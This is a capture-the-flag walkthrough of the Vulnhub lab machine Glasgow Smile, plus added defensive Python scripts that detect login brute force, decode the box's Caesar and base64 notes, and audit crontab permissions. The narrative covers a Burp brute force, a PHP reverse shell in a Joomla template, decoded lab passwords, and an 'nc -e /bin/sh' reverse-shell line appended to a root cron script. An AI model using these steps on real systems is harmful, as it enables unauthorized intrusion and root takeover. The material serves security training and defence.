Hi guys! In this article, I'm going to show you how to solve the machine named Glasgow on the Vulnhub platform. Glasgow is an intermediate-level machine with three user flags and one root flag. The story of the box goes like this: enumerate the directories of the website, build a wordlist from the words on the site and brute force the login panel with it. Once we have access to the panel, we upload a PHP reverse shell to get a low-privilege shell on the machine. Then we find the database credentials, read the database content and obtain the first user's credentials, which gives us the first flag. After the first user, cryptography is the step to get the second user's password. With a shell as the second user, some recon is needed to discover a hidden file, and guessing that file's password reveals the third user's password. Finally, as the third user, a bit more recon shows what is happening on the box and how to get a root shell.
As always, the first step is running nmap on the machine to see the open ports and the services running on them.
As you can see, port 80 is open and a website is running on it. Port 22 (SSH) is also open. After checking the open ports, we fuzz the website for directories.
We can see a directory named "joomla". We could check what the website looks like, but before that I want to fuzz the joomla directory.
Here we see an "administrator" directory, which is a login panel. I tried some default credentials and bypass techniques here, but with no result. When we check the joomla website, we see some information.
It seems meaningless at first, but after a while I thought I could build a wordlist from it to use on the login panel. For that, we use the "cewl" tool and run "cewl http://192.168.134.129/joomla > wordlist.txt" to create the custom wordlist.
Once we have our custom wordlist, we intercept the login request and send it to Intruder in Burp Suite. Here we set "joomla" as the username, because I found it after some trials, and mark the password field as the payload position.
Before starting the attack, we need to load our custom wordlist as the payload.
Once we run the attack, we see the length and status code of the response for every payload. As highlighted, Gotham and City return a different status code and length. When we check the responses, we see that "Gotham" is the password we are looking for.
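From the web server's side, that Intruder run is a burst of POST requests to the administrator login from one address, with one response that differs in status and size. As an added example that is not part of this write-up, here is a small Python script that parses constructed Apache-style access-log lines and flags source IPs that hammer the Joomla login path; the log lines, IP addresses, timestamps and byte counts are invented for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-log lines for the demo (not from the Glasgow box).
# 192.168.134.130 fires six login POSTs in a few seconds; the last response has a
# different status and size, the same signal the write-up uses to spot the valid
# password. 192.168.134.140 is an ordinary visitor.
SAMPLE_LOG = """\
192.168.134.130 - - [10/May/2021:10:00:01 +0000] "POST /joomla/administrator/index.php HTTP/1.1" 200 1048 "-" "Mozilla/5.0"
192.168.134.130 - - [10/May/2021:10:00:02 +0000] "POST /joomla/administrator/index.php HTTP/1.1" 200 1048 "-" "Mozilla/5.0"
192.168.134.130 - - [10/May/2021:10:00:02 +0000] "POST /joomla/administrator/index.php HTTP/1.1" 200 1048 "-" "Mozilla/5.0"
192.168.134.130 - - [10/May/2021:10:00:03 +0000] "POST /joomla/administrator/index.php HTTP/1.1" 200 1048 "-" "Mozilla/5.0"
192.168.134.140 - - [10/May/2021:10:00:05 +0000] "GET /joomla/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
192.168.134.130 - - [10/May/2021:10:00:05 +0000] "POST /joomla/administrator/index.php HTTP/1.1" 200 1048 "-" "Mozilla/5.0"
192.168.134.130 - - [10/May/2021:10:00:06 +0000] "POST /joomla/administrator/index.php HTTP/1.1" 303 1050 "-" "Mozilla/5.0"
192.168.134.140 - - [10/May/2021:10:03:00 +0000] "POST /joomla/administrator/index.php HTTP/1.1" 303 1050 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
LOGIN_PATH = "/joomla/administrator/index.php"


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
        "size": int(m.group("size")) if m.group("size") != "-" else 0,
    }


def find_login_bursts(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: {"count": n, "responses": [...]}} for every IP whose login POSTs
    reach `threshold` inside any `window`. `responses` lists the distinct
    (status, size) pairs seen, so a lone odd response stands out."""
    posts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == LOGIN_PATH:
            posts[rec["ip"]].append(rec)
    bursts = {}
    for ip, recs in posts.items():
        recs.sort(key=lambda r: r["ts"])
        start, best = 0, 0
        for end in range(len(recs)):           # sliding window over sorted timestamps
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            bursts[ip] = {
                "count": len(recs),
                "responses": sorted({(r["status"], r["size"]) for r in recs}),
            }
    return bursts


if __name__ == "__main__":
    for ip, info in find_login_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {info['count']} login POSTs, distinct responses {info['responses']}")
```

Run as-is it reports only 192.168.134.130; the single (303, 1050) among many (200, 1048) responses is the same anomaly the attacker reads off Intruder, just seen from the other side.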
SHELL AND USERS
Once we log into the Joomla control panel, we go to the template settings and put our PHP reverse shell code into index.php.
Once we listen on the port set in the PHP shell and visit the website, we have a low-privilege shell on the machine.
After some recon, we find database credentials in configuration.php.
We connect to MySQL and list the databases by running "mysql -u joomla -p" and "show databases;".
Then we run "use batjoke;" and "show tables;" to see the table names in the database.
Now we can view the table contents by running "select * from taskforce;".
As you can see in the screenshot above, we obtained some credentials, and when we check the users on the machine we realize we have user rob's password. But it is base64 encoded. To decode it, we run 'echo "Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/" | base64 -d'. Now we have the first user's credentials: "rob:???AllIHaveAreNegativeThoughts???". We log in over SSH as rob and get the first flag.
For the second user and flag, we view the contents of the "Abnerineedyourhelp" file and use a cipher identifier to work out what it is.
As the cipher identifier says, it is most likely a Caesar cipher, so let's try to decode it. Success!
The decoded text contains user Abner's password in base64. Decoding it gives us the second user's credentials: "Abner:I33hope99my0death000makes44more8cents00than0my0life0". Now we can get the second flag.
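The two decoding steps in this part, a Caesar shift followed by base64, are easy to automate without an online identifier. The Python block below is an added example, not code from the write-up: it tries all 26 shifts, ranks the candidates by how many common English words they contain, and then pulls out any base64 tokens in the winner that decode to printable text. The note it decodes is a constructed sample that the script itself encrypts with a shift of 3, not the real Abnerineedyourhelp file; the only value taken from the box is rob's base64 string from the database.

```python
import base64
import binascii
import re

# Small set of common English words; a candidate decryption is ranked by how many it contains.
COMMON_WORDS = {"the", "and", "you", "your", "for", "need", "help", "is", "in", "it",
                "my", "of", "to", "this", "with", "that", "password", "account", "me", "i", "a"}


def caesar_shift(text, shift):
    """Shift A-Z and a-z by `shift` positions (mod 26); every other character passes through."""
    out = []
    for ch in text:
        if "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        elif "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        else:
            out.append(ch)
    return "".join(out)


def english_score(text):
    """Number of whitespace/punctuation-delimited words that are in COMMON_WORDS."""
    return sum(1 for w in re.findall(r"[a-z]+", text.lower()) if w in COMMON_WORDS)


def crack_caesar(ciphertext):
    """Try all 26 shifts and return (shift, plaintext) for the most English-looking candidate."""
    shift = max(range(26), key=lambda s: english_score(caesar_shift(ciphertext, -s)))
    return shift, caesar_shift(ciphertext, -shift)


def decode_base64_tokens(text):
    """Return {token: decoded} for tokens that are valid base64 of printable ASCII.
    Short tokens are skipped so ordinary words are not mistaken for base64."""
    found = {}
    for token in text.split():
        token = token.strip(".,;:!?\"'")
        if len(token) < 16 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", token):
            continue
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw and all(32 <= b < 127 for b in raw):
            found[token] = raw.decode("ascii")
    return found


def recover_passwords(ciphertext):
    """Caesar-decrypt the note, then return (shift, [decoded base64 tokens])."""
    shift, plaintext = crack_caesar(ciphertext)
    return shift, list(decode_base64_tokens(plaintext).values())


# Constructed sample note (not the file from the machine): English text with a
# made-up password embedded as base64, encrypted here with a Caesar shift of 3.
SAMPLE_PASSWORD = "constructed-example-password"
SAMPLE_PLAINTEXT = ("Abner, I need your help. The password for my account is in this "
                    "base64 string, decode it and log in: "
                    + base64.b64encode(SAMPLE_PASSWORD.encode()).decode())
SAMPLE_CIPHERTEXT = caesar_shift(SAMPLE_PLAINTEXT, 3)

# rob's credential exactly as it appeared in the taskforce table in the write-up.
ROB_B64 = "Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/"

if __name__ == "__main__":
    shift, passwords = recover_passwords(SAMPLE_CIPHERTEXT)
    print(f"shift {shift}, recovered: {passwords}")
    print(decode_base64_tokens(ROB_B64))
```

Word counting rather than letter frequency is used on purpose: the base64 blob inside the note looks like random letters and would skew a chi-squared frequency test on such a short text, while it contributes almost nothing to the word count of any shift.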
At this point, I used the linpeas script for better enumeration, and something caught my interest: there is a hidden zip file.
When we unzip the file and view its content, we have user penguin's password.
So we have the third user's credentials: "penguin:scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz". Now we can get the third flag.
When we read the note in penguin's home directory, we see that it gives us a hint for root.
Here, the ".trash_old" file is the software the author mentioned. After some thought, I used pspy to monitor the processes running on the box.
As you can see in the screenshot above, ".trash_old" is run from a cron job as root. So we can edit the file to get a reverse shell as root. To do this, we add the "nc -e /bin/sh 192.168.134.130 1234" command to the file.
When we listen on port 1234 on our machine, we get the reverse shell after a short while, and we can read the root flag.
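The root path on this box is the classic one: a cron job run by root executes a file that a low-privileged user can write. As an added example, not from the write-up, the Python script below audits a system crontab the way a hardening check would: for every command run as root it reports whether the target is a hidden file, is owned by someone other than root, is writable by group or others, or sits in a world-writable directory. The crontab text and the two job scripts are constructed in a temporary directory for the demo; nothing is read from a real /etc/crontab.

```python
import os
import stat
import tempfile


def parse_system_crontab(text):
    """Yield (user, command) for each job line in /etc/crontab format:
    five schedule fields, the user to run as, then the command."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 6)
        if "=" in parts[0] or len(parts) < 7:   # environment assignment or malformed line
            continue
        yield parts[5], parts[6]


def audit_command_path(path):
    """Return the reasons a file executed from cron is a privilege-escalation risk
    (empty list = nothing found). The checks mirror what happened on this box: a
    hidden file in a user's directory, writable by that user, executed by root."""
    reasons = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing-target"]
    if st.st_uid != 0:
        reasons.append("not-owned-by-root")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("group-or-other-writable")
    if os.path.basename(path).startswith("."):
        reasons.append("hidden-file")
    parent = os.stat(os.path.dirname(path))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent-dir-world-writable")   # file could be replaced wholesale
    return reasons


def audit_crontab(text):
    """Map each absolute command path that cron runs as root to its list of findings."""
    findings = {}
    for user, command in parse_system_crontab(text):
        target = command.split()[0]
        if user != "root" or not target.startswith("/"):
            continue   # only root jobs with an absolute path are audited in this example
        reasons = audit_command_path(target)
        if reasons:
            findings[target] = reasons
    return findings


def build_demo():
    """Create two constructed job scripts in a temp dir and audit a constructed crontab.
    Returns (findings, risky_path, safe_path)."""
    workdir = tempfile.mkdtemp(prefix="cron-audit-")
    risky = os.path.join(workdir, ".trash_old")      # hidden and world-writable: the Glasgow pattern
    safe = os.path.join(workdir, "rotate_logs.sh")   # normal permissions
    for path, mode in ((risky, 0o777), (safe, 0o755)):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho constructed job\n")
        os.chmod(path, mode)
    crontab = f"""\
# constructed /etc/crontab for the demo
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * *   root    {risky}
0 3 * * *   root    {safe} --quiet
*/5 * * * * penguin {risky}
"""
    return audit_crontab(crontab), risky, safe


if __name__ == "__main__":
    findings, _, _ = build_demo()
    for path, reasons in findings.items():
        print(f"{path}: {', '.join(reasons)}")
```

On the real box the fix is the mirror image of the exploit: the job's target must be owned by root and not writable by anyone else, and a hidden script under a user's home directory should not be on root's crontab at all. The same checks apply to /etc/cron.d entries and to the directories named in a root job's PATH.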
Glasgow on Vulnhub : https://www.vulnhub.com/entry/glasgow-smile_11,491/
Cipher Identifier : https://www.boxentriq.com/code-breaking/cipher-identifier